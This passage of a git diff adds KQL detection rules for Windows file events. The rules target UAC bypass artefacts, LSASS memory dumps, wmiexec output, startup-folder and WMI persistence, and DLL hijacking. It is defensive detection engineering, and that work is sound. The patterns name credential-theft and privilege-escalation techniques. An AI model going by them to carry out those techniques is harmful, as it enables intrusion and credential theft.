+| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".jse" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psd1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".url" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql
new file mode 100644
index 00000000..5a39750e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/teamviewer_remote_session.kql
@@ -0,0 +1,12 @@
+// Title: TeamViewer Remote Session
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-30
+// Level: medium
+// Description: Detects the creation of log files during a TeamViewer remote session
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate uses of TeamViewer in an organisation
+
+DeviceFileEvents
+| where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql
new file mode 100644
index 00000000..91f5299e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_abusing_winsat_path_parsing_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql
new file mode 100644
index 00000000..b1d43d9e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_consent_and_comctl32_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Consent and Comctl32 - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql
new file mode 100644
index 00000000..7b2d47c9
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_eventvwr.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using EventVwr
+// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql
new file mode 100644
index 00000000..a21f5527
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_idiagnostic_profile_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IDiagnostic Profile - File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql
new file mode 100644
index 00000000..c451bb97
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_ieinstal_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IEInstal - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql
new file mode 100644
index 00000000..71051fa8
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_msconfig_token_modification_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using MSConfig Token Modification - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql
new file mode 100644
index 00000000..52251d21
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_net_code_profiler_on_mmc.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using .NET Code Profiler on MMC
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql
new file mode 100644
index 00000000..e2bef7cb
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_ntfs_reparse_point_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
new file mode 100644
index 00000000..de70bf24
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uac_bypass_using_windows_media_player_file.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - File
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceFileEvents
+| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
new file mode 100644
index 00000000..6ebcc586
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uefi_persistence_via_wpbbin_filecreation.kql
@@ -0,0 +1,12 @@
+// Title: UEFI Persistence Via Wpbbin - FileCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-18
+// Level: high
+// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001
+// False Positives:
+//   - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
new file mode 100644
index 00000000..7e0c2a34
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uncommon_file_created_in_office_startup_folder.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon File Created In Office Startup Folder
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-05
+// Level: high
+// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+//   - False positive might stem from rare extensions used by other Office utilities.
+
+DeviceFileEvents
+| where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql
new file mode 100644
index 00000000..85e794da
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/uncommon_file_creation_by_mysql_daemon_process.kql
@@ -0,0 +1,11 @@
+// Title: Uncommon File Creation By Mysql Daemon Process
+// Author: Joseph Kamau
+// Date: 2024-05-27
+// Level: high
+// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
+// Which could be an indicator of "User Defined Functions" abuse to download malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql
new file mode 100644
index 00000000..9281e3e4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/vhd_image_download_via_browser.kql
@@ -0,0 +1,13 @@
+// Title: VHD Image Download Via Browser
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-10-25
+// Level: medium
+// Description: Detects creation of ".vhd"/".vhdx" files by browser processes.
+// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+//   - Legitimate downloads of ".vhd" files would also trigger this
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql
new file mode 100644
index 00000000..4f34b52a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/visual_studio_code_tunnel_remote_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: Visual Studio Code Tunnel Remote File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
new file mode 100644
index 00000000..9f0a8e94
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/vscode_powershell_profile_modification.kql
@@ -0,0 +1,12 @@
+// Title: VsCode Powershell Profile Modification
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013
+// False Positives:
+//   - Legitimate use of the profile by developers or administrators
+
+DeviceFileEvents
+| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
new file mode 100644
index 00000000..d8b77bc4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/werfault_lsass_process_memory_dump.kql
@@ -0,0 +1,10 @@
+// Title: WerFault LSASS Process Memory Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
new file mode 100644
index 00000000..2a65cb74
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/windows_binaries_write_suspicious_extensions.kql
@@ -0,0 +1,10 @@
+// Title: Windows Binaries Write Suspicious Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects Windows executables that write files with suspicious extensions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceFileEvents
+| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Program Files\\WindowsApps\\Clipchamp" and FolderPath contains ".ps1")) or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe")) and FolderPath endswith ".ps1" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
new file mode 100644
index 00000000..6b5f1455
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/windows_shell_scripting_application_file_write_to_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Windows Shell/Scripting Application File Write to Suspicious Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-20
+// Level: high
+// Description: Detects Windows shells and scripting applications that write files to suspicious folders
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql
new file mode 100644
index 00000000..1a04b77d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/windows_terminal_profile_settings_modification_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: Windows Terminal Profile Settings Modification By Uncommon Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-22
+// Level: medium
+// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015
+// False Positives:
+//   - Some false positives may occur with admin scripts that set WT settings.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql
new file mode 100644
index 00000000..8a1dea3f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/winrar_creating_files_in_startup_locations.kql
@@ -0,0 +1,11 @@
+// Title: WinRAR Creating Files in Startup Locations
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-16
+// Level: high
+// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.
+// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
new file mode 100644
index 00000000..46a52999
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/winsxs_executable_file_creation_by_non_system_process.kql
@@ -0,0 +1,10 @@
+// Title: WinSxS Executable File Creation By Non-System Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: medium
+// Description: Detects the creation of binaries in the WinSxS folder by non-system processes
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceFileEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
new file mode 100644
index 00000000..14818dbc
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmi_persistence_script_event_consumer_file_write.kql
@@ -0,0 +1,12 @@
+// Title: WMI Persistence - Script Event Consumer File Write
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects file writes of WMI script event consumer
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+//   - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
new file mode 100644
index 00000000..f6b6e93b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmiexec_default_output_file.kql
@@ -0,0 +1,12 @@
+// Title: Wmiexec Default Output File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: critical
+// Description: Detects the creation of the default output filename used by the wmiexec tool
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1047
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
new file mode 100644
index 00000000..33a1e19f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wmiprvse_wbemcomn_dll_hijack_file.kql
@@ -0,0 +1,10 @@
+// Title: Wmiprvse Wbemcomn DLL Hijack - File
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/writing_local_admin_share.kql b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql
new file mode 100644
index 00000000..4489d5f9
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/writing_local_admin_share.kql
@@ -0,0 +1,11 @@
+// Title: Writing Local Admin Share
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB).
+// This technique is used by post-exploitation frameworks.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002
+
+DeviceFileEvents
+| where FolderPath contains "\\\\127.0.0" and FolderPath contains "\\ADMIN$\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
new file mode 100644
index 00000000..f10c0b30
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/wscript_or_cscript_dropper_file.kql
@@ -0,0 +1,10 @@
+// Title: WScript or CScript Dropper - File
+// Author: Tim Shelton
+// Date: 2022-01-10
+// Level: high
+// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
